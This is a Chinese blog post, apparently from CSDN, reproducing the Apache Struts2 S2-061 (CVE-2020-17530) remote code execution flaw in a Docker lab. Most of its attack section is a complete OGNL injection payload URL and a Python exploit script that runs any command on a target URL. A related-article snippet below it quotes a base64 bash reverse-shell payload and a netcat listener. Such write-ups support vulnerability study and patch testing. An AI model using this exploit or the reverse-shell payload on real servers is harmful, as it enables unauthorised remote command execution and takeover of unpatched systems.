Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)

最新推荐文章于 2024-04-24 10:33:50 发布
最新推荐文章于 2024-04-24 10:33:50 发布
阅读量2k 收藏 3
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/111226322
版权

1.漏洞简介

        Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行。

2.影响版本

Apache Struts 2.0.0 - 2.5.25

3.环境搭建

1)使用docker安装

项目地址:

https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

2)访问目标地址

4.漏洞POC

http://192.168.157.148:8080/?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27id%27}).(%23res%3d%23exec.exec(%23cmd))}

5.漏洞复现

1)远程执行命令id

http://192.168.157.148:8080/?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27id%27}).(%23res%3d%23exec.exec(%23cmd))}

6.POC脚本

# encoding=utf-8
import requests
import sys
from lxml import etree
 
 
def exp(url,cmd):
    payload="%25%7b(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27"+cmd+"%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d"
    tturl=url+"/?id="+payload
    r=requests.get(tturl)
    page=r.text
#   etree=html.etree
    page=etree.HTML(page)
    data = page.xpath('//a[@id]/@id')
    print(data[0])
 
if __name__=='__main__':
    print('+------------------------------------------------------------+')
    print('+ EXP: python struts2-061-poc.py http://1.1.1.1:8081 id      +')
    print('+ VER: Struts 2.0.0-2.5.25                                   +')
    print('+------------------------------------------------------------+')
    print('+ S2-061 RCE && CVE-2020-17530                               +')
    print('+------------------------------------------------------------+')
    if len(sys.argv)!=3:
        print("[+]ussage: http://ip:port command")
        print("[+]============================================================")
        sys.exit()
    url=sys.argv[1]
    cmd=sys.argv[2]
exp(url,cmd)

POC脚本验证

python3 cve-2020-17530.py http://192.168.157.148:8080 id

python3 cve-2020-17530.py http://192.168.157.148:8080 whoami

7.修复建议

将Apache Struts框架升级至最新版本

相关链接:

https://cwiki.apache.org/confluence/display/WW/S2-061

chaojixiaojingang
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Struts2 s2-061 Poc分析1
08-03
Struts2 s2-061 是一个关于 Apache Struts2 框架的安全漏洞,具体为 OGNL(Object-Graph Navigation Language)表达式注入导致的远程代码执行问题。这个漏洞CVE-2020-17530)在2020年12月8日被公开,影响了使用...
编码转换漏洞_CVE202017530 Struts2S2061远程代码执行漏洞
weixin_39959335的博客
01-14 457
漏洞信息漏洞编号:CVE-2020-17530漏洞描述:Apache Struts2框架是第二代基于Model-View-Controller(MVC)模型Java企业级Web应用框架,成为国内外较为流行的容器软件中间件,于2020年12月8日披露S2-061 Struts2远程代码执行漏洞。由于Struts2会对某些标签属性(如id)的属性值进行二次表达式解析,当这些标签属性中使用了%...
CVE-2020-17530 Struts2-061远程代码执行漏洞
Makboli的博客
08-29 1254
CVE-2020-17530 Struts2-061远程代码执行漏洞
Struts2远程代码执行漏洞CVE-2020-17530) 复现及排查
dayouzi的博客
08-15 1319
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。CVE-2020-17530是对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。在特定的环境下,远程攻击者通过构造恶意的OGNL表达式,可造成任意代码执行
Struts2 S2-061 远程命令执行漏洞CVE-2020-17530漏洞复现
sechelper的博客
01-11 628
cve漏洞详细复现,漏洞利用,反弹shell,工具分享
Struts2 S2-061(CVE-2020-17530)漏洞复现
qq_56258713的博客
07-03 1378
Struts2 S2-061(CVE-2020-17530)漏洞复现
Struts2 s2-032远程代码执行分析1
08-08
Struts2 s2-032 远程代码执行漏洞是一个严重的安全问题,涉及到的是Apache Struts2框架的一个核心功能,即动态方法调用。这个漏洞发生在2016年4月15日,被安恒安全研究院发现,并被CVE(Common Vulnerabilities and ...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
首先,s2-005漏洞CVE-2012-0881)是2012年发现的一个严重问题,它涉及到Struts2的OGNL(Object-Graph Navigation Language)表达式在反序列化过程中的不当处理。OGNL是一种强大的表达式语言,允许动态访问和操作...
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
09-08
2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
其中,S2-045 和 CVE-2017-5638 是一个极其严重的问题,可能导致远程代码执行(RCE),进而让攻击者完全控制受影响的服务器。 S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个...
漏洞复现】6.Struts2 S2-061 远程命令执行漏洞CVE-2020-17530)复现与分析
Zichel77的博客
03-21 1392
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
vulfocus 靶场struts2 代码执行CVE-2020-17530
最新发布
没有故事
04-24 840
由于Struts2 会对某些标签属性(比如 id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户即可构造一些SSRF、远程命令执行等形式的payload,并将这些恶意payload以%{...}形式传入该标签属性, 即可造成OGNL表达式执行。bash -c {echo,编码后的内容} |{base64 ,-d}|{bash , -i} #或: 抓包,改为如下内容: 红色部分为要更改的地方。监听机进行监听:nc -lvvp。
S2-061远程代码执行漏洞和fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
weixin_48739941的博客
04-21 2494
1. 复现S2-061远程代码执行漏洞 (1) cd vulhub/struts2/s2-061 切换目录。 (2) docker-compose up -d 启动。 (3) http://192.168.80.161:8080/ (4)执行命令: http://192.168.80.161:8080/?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27or
struts2 CVE-2020-17530漏洞复现
Armandhe的博客
06-08 789
我丝毫不敢休息,又肝了一篇
Struts2-S2-061远程命令执行(CVE-2020-17530)漏洞复现
qq_57172130的博客
05-03 642
目录 框架介绍 漏洞原理 影响版本 环境搭建 漏洞探测 漏洞利用 防御措施 框架介绍 Apache Struts 2最初被称为WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用程序。Struts 2是Struts 1的一个升级版,但是它和Struts 1来相比,提供了太多的增强和改进,怎么运行的呢,就是实现了Servlet的功能,来进行控制页面跳转。同时这也是基于MVC设计模式的Web应用框架,Struts 2的控制功能就相当于MVC中的Controll
CVE-2020-17530 Struts2远程代码执行漏洞复现
m0_58596609的博客
01-12 1201
CVE-2020-17530 Struts2远程代码执行漏洞复现
Struts2 S2-061 漏洞分析:OGNL表达式注入与远程代码执行
"Apache Struts2S2-061 漏洞是一个严重的远程代码执行漏洞,出现在使用特定tag时的OGNL表达式注入。该漏洞2020年12月8日被公开,允许攻击者通过构造恶意输入来绕过OGNL沙盒限制,执行任意代码。在分析Poc时,...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值